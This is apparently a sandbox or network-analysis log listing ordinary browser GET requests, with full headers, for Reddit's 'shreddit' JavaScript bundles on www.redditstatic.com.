Source: global trafficHTTP traffic detected: GET /shreddit/en-US/expandable-section-header-e3f969c2.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/rpl-coachmark-56fcc983.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/rpl-coachmark-card-556887f7.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/mod-post-list-client-js-2beb017f.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/content-tags-a63901fd.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-post-share-button-db45bf1d.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/with-share-687454db.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/index-7436fa38.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/profile-creation-61d368d7.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/expandable-mod-reports-base-fe038b1b.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/postFlair-1f8d3c96.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/promote-post-button-551d8c60.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/translation-intervention-modal-db1a7e08.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/translations-13fc818b.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/chat-mobile-xpromo-client-js-58e17cee.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/links-27a3f3ef.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/v2-events-f704ab2d.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/mod-verdict-9fb8e844.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/gallery-74f99861.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/community-club-highlights-client-js-c7c6ec6d.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/index-e6388eb1.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/index-7edea759.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/qr-code-modal-upsell-client-js-69907f68.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/all-chats-page-recommendations-client-js-e5594d8f.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/chat-channel-feed-element-client-js-646e3acb.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-media-lightbox-listener-6f703d9b.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-post-client-js-5df0a42f.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-post-flair-27335ad2.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-post-client-js-5df0a42f.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-tweet-embed-40b0c344.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-post-client-js-5df0a42f.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-pubsub-publisher-5f47a01a.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-post-client-js-5df0a42f.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/user-hover-card-client-js-cc766b03.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-post-client-js-5df0a42f.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/author-flair-event-handler-2f9b1a2c.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-post-client-js-5df0a42f.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/mod-notes-opener-2372b76a.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-post-client-js-5df0a42f.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/community-status-bottom-sheet-a47bf0a8.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-post-client-js-5df0a42f.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/recommends-feed-client-js-679e639f.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-post-client-js-5df0a42f.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/faceplate-progress-9c742d06.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-post-client-js-5df0a42f.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/follow-button-6c9f957a.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-post-client-js-5df0a42f.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/mod-notes-c8ab3c80.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-post-client-js-5df0a42f.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/subreddit-posting-eligibility-cf0ca862.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-post-client-js-5df0a42f.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/community-status-telemetry-7d0e84ad.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-post-client-js-5df0a42f.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/dsa-transparency-modal-client-js-68587b84.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/dsa-transparency-modal-provider-client-js-d42de5ac.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
